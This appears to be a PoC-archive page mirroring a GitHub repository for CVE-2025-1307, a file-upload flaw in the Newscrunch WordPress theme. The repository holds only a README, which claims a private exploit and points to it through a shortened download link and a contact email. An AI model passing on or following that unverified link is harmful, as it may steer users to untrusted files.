Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-1307 PoC — Newscrunch <= 1.8.4 - Authenticated (Subscriber+) Arbitrary File Upload

Source
https://github.com/McTavishSue/CVE-2025-1307
Associated Vulnerability
Title:Newscrunch <= 1.8.4 - Authenticated (Subscriber+) Arbitrary File Upload (CVE-2025-1307)
Description:The Newscrunch theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check in the newscrunch_install_and_activate_plugin() function in all versions up to, and including, 1.8.4.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
Description
Missing Authorization (CWE-862)
Readme
# CVE-2025-1307 Missing Authorization (CWE-862)

## Overview
A vulnerability in the Newscrunch theme for WordPress allows authenticated attackers with Subscriber-level access or higher to upload arbitrary files on the affected site's server. The vulnerability stems from a missing capability check in the newscrunch_install_and_activate_plugin() function in all versions up to and including 1.8.4.1.


## Details
+ **CVE ID**: CVE-2025-1307

+ **Published**: 03/04/2025

+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
## Impact
Attackers can potentially upload malicious files to the WordPress site, which could lead to remote code execution. This means an attacker could: - Upload and execute arbitrary PHP scripts - Compromise the entire WordPress site - Potentially gain unauthorized access to the server - Modify, delete, or steal sensitive site data - Use the compromised site for further malicious activities

## Affected Versions
WorldPress plugin : Newscrunch <= 1.8.4


## Contact
+ **For inquiries, please contact:LeronTavish@outlook.com**
## Exploit
+ **Exploit** :**[Download here](https://tinyurl.com/22kn38pk)**
File Snapshot

 [4.0K]  /data/pocs/39aa5ab4d7f92df9328dd754d5e89ed94118d50c
└── [1.1K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →